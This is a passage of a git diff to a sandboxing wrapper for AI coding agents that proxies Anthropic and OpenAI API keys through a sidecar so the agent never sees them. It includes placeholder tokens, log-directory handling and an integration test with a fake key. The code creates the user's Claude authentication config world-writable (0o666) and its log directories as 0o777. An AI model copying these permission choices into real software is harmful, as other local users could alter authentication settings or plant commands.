agentVolumes.push(`${effectiveHome}/.claude:/host${effectiveHome}/.claude:rw`);
+ // Mount ~/.claude.json for Claude Code authentication configuration
+ // This file must be accessible in chroot mode for Claude Code to find apiKeyHelper
+ // We create the file if it doesn't exist, then mount it
+ const claudeJsonPath = path.join(effectiveHome, '.claude.json');
+ if (!fs.existsSync(claudeJsonPath)) {
+ // Create parent directory if needed
+ const parentDir = path.dirname(claudeJsonPath);
+ if (!fs.existsSync(parentDir)) {
+ fs.mkdirSync(parentDir, { recursive: true, mode: 0o755 });
+ }
+ // Create empty file that will be populated by entrypoint
+ // Use 0o666 mode to allow container root to write and host user to read
+ // The entrypoint script runs as root and modifies this file
+ fs.writeFileSync(claudeJsonPath, '{}', { mode: 0o666 });
+ logger.debug(`Created ${claudeJsonPath} for chroot mounting`);
+ }
+ agentVolumes.push(`${claudeJsonPath}:/host${claudeJsonPath}:rw`);
+
// Mount ~/.cargo and ~/.rustup for Rust toolchain access
// On GitHub Actions runners, Rust is installed via rustup at $HOME/.cargo and $HOME/.rustup
// ~/.cargo must be rw because the credential-hiding code mounts /dev/null over
@@ -919,6 +956,10 @@ export function generateDockerCompose(
ipv4_address: networkConfig.proxyIp,
},
},
+ volumes: [
+ // Mount log directory for api-proxy logs
+ `${apiProxyLogsPath}:/var/log/api-proxy:rw`,
+ ],
environment: {
// Pass API keys securely to sidecar (not visible to agent)
...(config.openaiApiKey && { OPENAI_API_KEY: config.openaiApiKey }),
@@ -968,13 +1009,24 @@ export function generateDockerCompose(
// Use IP address instead of hostname for BASE_URLs since Docker DNS may not resolve
// container names in chroot mode
environment.AWF_API_PROXY_IP = networkConfig.proxyIp;
- if (config.openaiApiKey) {
- environment.OPENAI_BASE_URL = `http://${networkConfig.proxyIp}:10000`;
- logger.debug(`OpenAI API will be proxied through sidecar at http://${networkConfig.proxyIp}:10000`);
- }
+ // OPENAI_BASE_URL temporarily disabled for Codex - will be re-enabled in future
+ // if (config.openaiApiKey) {
+ // environment.OPENAI_BASE_URL = `http://${networkConfig.proxyIp}:10000/v1`;
+ // logger.debug(`OpenAI API will be proxied through sidecar at http://${networkConfig.proxyIp}:10000/v1`);
+ // }
if (config.anthropicApiKey) {
environment.ANTHROPIC_BASE_URL = `http://${networkConfig.proxyIp}:10001`;
logger.debug(`Anthropic API will be proxied through sidecar at http://${networkConfig.proxyIp}:10001`);
+
+ // Set placeholder token for Claude Code CLI compatibility
+ // Real authentication happens via ANTHROPIC_BASE_URL pointing to api-proxy
+ environment.ANTHROPIC_AUTH_TOKEN = 'placeholder-token-for-credential-isolation';
+ logger.debug('ANTHROPIC_AUTH_TOKEN set to placeholder value for credential isolation');
+
+ // Set API key helper for Claude Code CLI to use credential isolation
+ // The helper script returns a placeholder key; real authentication happens via ANTHROPIC_BASE_URL
+ environment.CLAUDE_CODE_API_KEY_HELPER = '/usr/local/bin/get-claude-key.sh';
+ logger.debug('Claude Code API key helper configured: /usr/local/bin/get-claude-key.sh');
}
logger.info('API proxy sidecar enabled - API keys will be held securely in sidecar container');
@@ -1027,6 +1079,20 @@ export async function writeConfigs(config: WrapperConfig): Promise {
}
logger.debug(`Squid logs directory created at: ${squidLogsDir}`);
+ // Create api-proxy logs directory for persistence
+ // If proxyLogsDir is specified, write to sibling directory (timeout-safe)
+ // Otherwise, write to workDir/api-proxy-logs (will be moved to /tmp after cleanup)
+ // Note: API proxy runs as user 'apiproxy' (non-root)
+ const apiProxyLogsDir = config.proxyLogsDir
+ ? path.join(path.dirname(config.proxyLogsDir), 'api-proxy-logs')
+ : path.join(config.workDir, 'api-proxy-logs');
+ if (!fs.existsSync(apiProxyLogsDir)) {
+ fs.mkdirSync(apiProxyLogsDir, { recursive: true, mode: 0o777 });
+ // Explicitly set permissions to 0o777 (not affected by umask)
+ fs.chmodSync(apiProxyLogsDir, 0o777);
+ }
+ logger.debug(`API proxy logs directory created at: ${apiProxyLogsDir}`);
+
// Create /tmp/gh-aw/mcp-logs directory
// This directory exists on the HOST for MCP gateway to write logs
// Inside the AWF container, it's hidden via tmpfs mount (see generateDockerCompose)
@@ -1453,6 +1519,33 @@ export async function cleanup(workDir: string, keepFiles: boolean, proxyLogsDir?
}
}
+ // Preserve api-proxy logs before cleanup
+ if (proxyLogsDir) {
+ // Logs were written directly to sibling of proxyLogsDir during runtime (timeout-safe)
+ // Just fix permissions so they're readable
+ const apiProxyLogsDir = path.join(path.dirname(proxyLogsDir), 'api-proxy-logs');
+ if (fs.existsSync(apiProxyLogsDir)) {
+ try {
+ execa.sync('chmod', ['-R', 'a+rX', apiProxyLogsDir]);
+ logger.info(`API proxy logs available at: ${apiProxyLogsDir}`);
+ } catch (error) {
+ logger.debug('Could not fix api-proxy log permissions:', error);
+ }
+ }
+ } else {
+ // Default behavior: move from workDir/api-proxy-logs to timestamped /tmp directory
+ const apiProxyLogsDir = path.join(workDir, 'api-proxy-logs');
+ const apiProxyLogsDestination = path.join(os.tmpdir(), `api-proxy-logs-${timestamp}`);
+ if (fs.existsSync(apiProxyLogsDir) && fs.readdirSync(apiProxyLogsDir).length > 0) {
+ try {
+ fs.renameSync(apiProxyLogsDir, apiProxyLogsDestination);
+ logger.info(`API proxy logs preserved at: ${apiProxyLogsDestination}`);
+ } catch (error) {
+ logger.debug('Could not preserve api-proxy logs:', error);
+ }
+ }
+ }
+
// Handle squid logs
if (proxyLogsDir) {
// Logs were written directly to proxyLogsDir during runtime (timeout-safe)
diff --git a/src/types.ts b/src/types.ts
index bf73cbbc..ece8415d 100644
--- a/src/types.ts
+++ b/src/types.ts
@@ -396,8 +396,9 @@ export interface WrapperConfig {
*
* When the corresponding API key is provided, the following environment
* variables are set in the agent container:
- * - OPENAI_BASE_URL=http://api-proxy:10000 (set when OPENAI_API_KEY is provided)
+ * - OPENAI_BASE_URL=http://api-proxy:10000/v1 (set when OPENAI_API_KEY is provided)
* - ANTHROPIC_BASE_URL=http://api-proxy:10001 (set when ANTHROPIC_API_KEY is provided)
+ * - CLAUDE_CODE_API_KEY_HELPER=/usr/local/bin/get-claude-key.sh (set when ANTHROPIC_API_KEY is provided)
*
* API keys are passed via environment variables:
* - OPENAI_API_KEY - Optional OpenAI API key for Codex
diff --git a/tests/integration/api-proxy.test.ts b/tests/integration/api-proxy.test.ts
index 475fcb98..5fc24164 100644
--- a/tests/integration/api-proxy.test.ts
+++ b/tests/integration/api-proxy.test.ts
@@ -85,6 +85,25 @@ describe('API Proxy Sidecar', () => {
expect(result.stdout).toContain(`ANTHROPIC_BASE_URL=http://${API_PROXY_IP}:10001`);
}, 180000);
+ test('should set ANTHROPIC_AUTH_TOKEN to placeholder in agent when Anthropic key is provided', async () => {
+ const result = await runner.runWithSudo(
+ 'bash -c "echo ANTHROPIC_AUTH_TOKEN=$ANTHROPIC_AUTH_TOKEN"',
+ {
+ allowDomains: ['api.anthropic.com'],
+ enableApiProxy: true,
+ buildLocal: true,
+ logLevel: 'debug',
+ timeout: 120000,
+ env: {
+ ANTHROPIC_API_KEY: 'sk-ant-fake-test-key-12345',
+ },
+ }
+ );
+
+ expect(result).toSucceed();
+ expect(result.stdout).toContain('ANTHROPIC_AUTH_TOKEN=placeholder-token-for-credential-isolation');
+ }, 180000);
+
test('should set OPENAI_BASE_URL in agent when OpenAI key is provided', async () => {
const result = await runner.runWithSudo(
'bash -c "echo OPENAI_BASE_URL=$OPENAI_BASE_URL"',